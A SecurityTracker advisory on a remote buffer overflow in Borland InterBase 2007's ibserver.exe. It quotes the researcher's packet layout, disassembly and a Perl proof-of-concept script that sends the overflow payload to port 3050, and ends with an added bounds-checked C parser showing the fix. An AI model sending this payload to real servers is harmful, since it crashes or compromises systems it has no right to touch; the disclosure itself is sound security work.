SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Database)  >  InterBase
Vendors:  Borland
Borland InterBase Buffer Overflow in 'ibserver.exe' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1019834
SecurityTracker URL:  http://securitytracker.com/id?1019834
CVE Reference:  CVE-2008-1910
Updated:  Apr 24 2008
Original Entry Date:  Apr 11 2008
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2007 SP2
Description:  A vulnerability was reported in InterBase. A remote user can execute arbitrary code on the target system.

A remote user can send specially crafted data to TCP port 3050 to trigger a buffer overflow in 'ibserver.exe' and execute arbitrary code on the target system. The code will run with the privileges of the target service.

Liu Zhen Hua reported this vulnerability.

Impact:  A remote user can execute arbitrary code on the target system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.codegear.com/downloads/regusers/interbase
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS), Windows (Any)
Reported By:  "Liu Zhen Hua" <alau@163.com>
Message History:   None.


Source Message Contents

Date:  Fri, 11 Apr 2008 15:46:38 +0800
From:  "Liu Zhen Hua" <alau@163.com>
Subject:  Borland InterBase 2007

 
Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC
 
Affected Software:
    Borland InterBase 2007 Service Pack 2.
    ibserver.exe version 8.0.0.123

Severity:
    High

Summary:
    There exists a vulnerability in Borland InterBase 2007.
    The attacker who successfully exploited this vulnerability can gain control of vulnerable systems.

Details:
    There exists a buffer overflow vulnerability in "ibserver.exe" which is contained in Borland InterBase 2007 Service Pack 2.
    The vulnerable opcode is 0x52.
    When sending some malformed data as below to TCP port 3050,

    | 4bytes Opcode  | "\x00\x00\x00\x52" |
    | 4bytes Unknown | "\xFF\xFF\xFF\xFF" |
    | 4bytes Length1 | "\x00\x00\x03\xE8" |
    | Data1          | "\x41"x1000        |
    | 4bytes Length2 | "\x00\x00\x00\x10" |
    | Data2          | "\x42"x16          |

    InterBase ibserver service will terminate and reboot.
    It results in the return address being overwritten as following.

    .text:0041460F mov     ecx, [ebp+arg_4]
    .text:00414612 xor     edx, edx
    .text:00414614 mov     dx, [ecx]
    .text:00414617 push    edx
    .text:00414618 mov     eax, [ebp+arg_4]
    .text:0041461B mov     ecx, [eax+4]
    .text:0041461E push    ecx                 // | Data1 | "\x41"x1000
    .text:0041461F mov     edx, [ebp+arg_0]
    .text:00414622 push    edx
    .text:00414623 mov     eax, [ebp+arg_0]
    .text:00414626 mov     ecx, [eax+4]
    .text:00414629 call    dword ptr [ecx+8]   // call function 411136 (strcpy)

    .text:00411136 push    ebp
    .text:00411137 mov     ebp, esp
    .text:00411139 push    ecx
    .text:0041113A push    esi
    .text:0041113B push    edi
    ......
    .text:00411157 mov     ecx, [ebp+loop_count]
    .text:0041115A mov     eax, [ebp+recv_info_struct]
    .text:0041115D mov     esi, [eax+0Ch]
    .text:00411160 mov     edi, [ebp+arg_4]
    .text:00411163 mov     edx, ecx
    .text:00411165 shr     ecx, 2
    .text:00411168 rep movsd                   // copy data 1000 bytes 0x41, without boundary check
                                               // Buffer overflow takes place
    .text:0041116A mov     ecx, edx
    .text:0041116C and     ecx, 3
    .text:0041116F rep movsb

    :stack
    FrameEBP  RetEIP    Syms  Symbol
    013AF5EC  41414141  N     ibserver!.text + 00026F68

How to Reproduce:
    Run the POC as below:
    poc.pl victimAddress

Discovered by:
    Liu Zhen Hua

###############################################################################################################
# POC.pl
#
###############################################################################################################
#!/usr/bin/perl -w
#Author: Liu Zhen Hua <alau [at] 163.com>
use IO::Socket;
use strict;

my $host=$ARGV[0];

sub usage {
    print "usage: perl poc.pl serverip\n";
}

if ($#ARGV < 0) {
    usage();
    exit();
}

my $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$host, PeerPort=>3050);
my $pad0 = "\x41"x1000; #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16;
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x10".$pad5;

print $victim $exploit ;
print " + Malicious request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;
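The disassembly in the message shows the root cause: Length1 from the request is used as the count for a rep movsd/rep movsb copy into a fixed-size buffer with no boundary check. The C code below is an added example written for this page; it is not part of the advisory, the researcher's message, or Borland's ibserver. It parses the opcode 0x52 layout the message describes (4-byte opcode, 4-byte unknown, 4-byte Length1, Data1, 4-byte Length2, Data2) and copies each field only after checking that it fits both the bytes actually received and the destination buffer, which is the check the vulnerable copy omits. The struct, the destination capacities (DATA1_CAPACITY, DATA2_CAPACITY) and the function names are assumptions for illustration, and build_request52 constructs test input rather than replaying captured traffic.

```c
/*
 * Added example (not from the advisory or from Borland/CodeGear): a bounds-checked
 * parser for the request layout the advisory describes for opcode 0x52:
 *   4-byte opcode | 4-byte unknown | 4-byte Length1 | Data1 | 4-byte Length2 | Data2
 * Buffer sizes, struct layout and names are assumptions made for this example.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define OPCODE_VULN     0x52u
#define DATA1_CAPACITY  256   /* assumed destination size; not taken from the advisory */
#define DATA2_CAPACITY  64    /* assumed destination size; not taken from the advisory */

enum parse_result {
    PARSE_OK = 0,
    PARSE_TRUNCATED,     /* message is shorter than its own length fields claim */
    PARSE_OVERSIZED,     /* a length field exceeds the destination capacity */
    PARSE_WRONG_OPCODE
};

struct request52 {
    uint32_t opcode;
    uint32_t unknown;
    uint32_t len1;
    uint8_t  data1[DATA1_CAPACITY];
    uint32_t len2;
    uint8_t  data2[DATA2_CAPACITY];
};

/* Big-endian 32-bit read, matching the byte order in the advisory's layout table. */
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Copy one length-prefixed field, refusing anything that does not fit. */
static enum parse_result take_field(const uint8_t *msg, size_t msg_len, size_t *off,
                                    uint8_t *dst, size_t cap, uint32_t *out_len)
{
    if (msg_len - *off < 4)
        return PARSE_TRUNCATED;
    uint32_t n = rd32(msg + *off);
    *off += 4;
    if (n > cap)                 /* the boundary check the vulnerable copy lacks */
        return PARSE_OVERSIZED;
    if (n > msg_len - *off)      /* claimed length runs past the bytes received */
        return PARSE_TRUNCATED;
    memcpy(dst, msg + *off, n);
    *off += n;
    *out_len = n;
    return PARSE_OK;
}

enum parse_result parse_request52(const uint8_t *msg, size_t msg_len, struct request52 *req)
{
    memset(req, 0, sizeof *req);
    if (msg_len < 8)
        return PARSE_TRUNCATED;
    req->opcode  = rd32(msg);
    req->unknown = rd32(msg + 4);
    if (req->opcode != OPCODE_VULN)
        return PARSE_WRONG_OPCODE;

    size_t off = 8;
    enum parse_result r = take_field(msg, msg_len, &off, req->data1, DATA1_CAPACITY, &req->len1);
    if (r != PARSE_OK)
        return r;
    return take_field(msg, msg_len, &off, req->data2, DATA2_CAPACITY, &req->len2);
}

/* Build a message in the advisory's layout: constructed test input, not captured traffic.
 * Returns the message length, or 0 if it would not fit in buf. */
size_t build_request52(uint8_t *buf, size_t cap, uint32_t len1, uint8_t fill1,
                       uint32_t len2, uint8_t fill2)
{
    size_t need = 8 + 4 + (size_t)len1 + 4 + (size_t)len2;
    if (need > cap)
        return 0;
    wr32(buf, OPCODE_VULN);
    wr32(buf + 4, 0xFFFFFFFFu);
    uint8_t *p = buf + 8;
    wr32(p, len1); p += 4; memset(p, fill1, len1); p += len1;
    wr32(p, len2); p += 4; memset(p, fill2, len2);
    return need;
}

/* Verdict for a request built with the given field lengths. */
enum parse_result classify(uint32_t len1, uint32_t len2)
{
    uint8_t buf[2048];
    struct request52 req;
    size_t n = build_request52(buf, sizeof buf, len1, 0x41, len2, 0x42);
    if (n == 0)
        return PARSE_TRUNCATED;
    return parse_request52(buf, n, &req);
}

int main(void)
{
    /* The advisory's lengths: Length1 = 0x3E8 (1000), Length2 = 0x10 (16). */
    printf("advisory lengths (1000/16): verdict %d\n", classify(1000, 16));
    printf("small request (32/16):      verdict %d\n", classify(32, 16));
    return 0;
}
```

With the assumed 256-byte Data1 capacity, the 1000-byte Data1 from the advisory is rejected as oversized before any copy happens, while a request whose fields fit is parsed normally; a message cut short on the wire is rejected as truncated rather than read past its end.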


Copyright 2007, SecurityGlobal.net LLC